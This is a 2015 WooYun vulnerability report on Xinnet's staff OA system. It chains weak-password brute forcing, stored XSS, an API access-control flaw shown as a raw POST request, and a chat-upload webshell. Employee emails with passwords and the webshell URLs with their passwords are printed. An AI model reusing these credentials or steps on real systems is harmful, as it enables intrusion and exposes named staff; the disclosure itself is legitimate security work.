当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149029

漏洞标题:新网华通员工OA系统弱口令导致Getshell

相关厂商:新网华通信息技术有限公司

漏洞作者: 大白胖纸

提交时间:2015-10-24 09:03

修复时间:2015-10-29 09:04

公开时间:2015-10-29 09:04

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一切都是从弱口令开始的

详细说明:

1、弱密码:

http://******.xinnet.com/account/login


首页.jpg


我扶了扶眼镜,没有看见验证码,用名字+弱口令爆破,得到
lilan@xinnet.com;123456,登录成功。

登录成功.jpg


删不掉.jpg


PS:这个婴儿的头衔我也是醉了……还有,这版聊的信息删不掉的啊!罪证就这样置顶了
2、XSS:
系统内超多XSS,然而并没有什么大用。举2个例子,剩下的自查吧,要不然天亮也写不完。
(1)新建文件夹 ,文件夹名写XSS(完全不用绕过)

文件夹xss.jpg


(2)待办事项,事项名写XSS(也完全不用绕过)

待办事项.jpg


3、越权读取用户信息
OA上有app下载,怀着好奇(捣乱)的心情,我把它下载到手机。
玩着玩着就看到了这……

信息.jpg


这是要发啊。600多人的信息一览无余。但这不是越权,只是正常的业务流程,真正越权的在下面

越权.jpg


"profile_view_password":"e10adc3949ba59abbe56e057f20f883e"多么熟悉的md5,这就是123456啊!换一个member_id试试:

POST /api/member/getUserInfo HTTP/1.1
Host: gouuse.xinnet.com
Proxy-Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: 够用 1.8.7 rv:1.0 (iPhone; iPhone OS 9.0.2; zh_CN)
Content-Length: 308
Accept-Encoding: gzip
Connection: close
source=2&appVersion=1.8.7&sn=bcd19046a95f72c2fffa9e0406a291c92dedfab0966f29088cd23390937093ca&member_id=249&n=50&command=member%2FgetUserInfo&token=e937784e1385a8dc0c0314f00112ec4b72567da68ba159abce8f31b464a1c12742fb815fff9218ee3d82bf913ee2c46a8f3bbd1e354e24e05196c56ac1a1e9849d665b10b286ed64feed02be1d12a72b


任意用户密码.jpg


密码正确.jpg


至此又拿到一个账号:zbliurongjing@xinnet.com;123456
4、getshell
至此可以拿出标题的漏洞了。很多地方上传都过滤了,各种上传的姿势试了一个遍,终于在这个不起眼的地方找到了。
通讯录,聊天页有个上传文件的功能

通讯录shell.jpg


http://gouuse.xinnet.com/tmp/upload/c/4/1/im/33/e7/1_587.php

密码123

大马.jpg


上菜刀

http://gouuse.xinnet.com/tmp/upload/c/4/1/im/c9/f0/1_794.php

密码cmd

shell.jpg


漏洞证明:

差不多就到这吧

修复方案:

你们比我更专业

版权声明:转载请注明来源 大白胖纸@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-29 09:04

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-10-29:非常感谢大白胖纸@乌云,小新正在玩命确认及修复中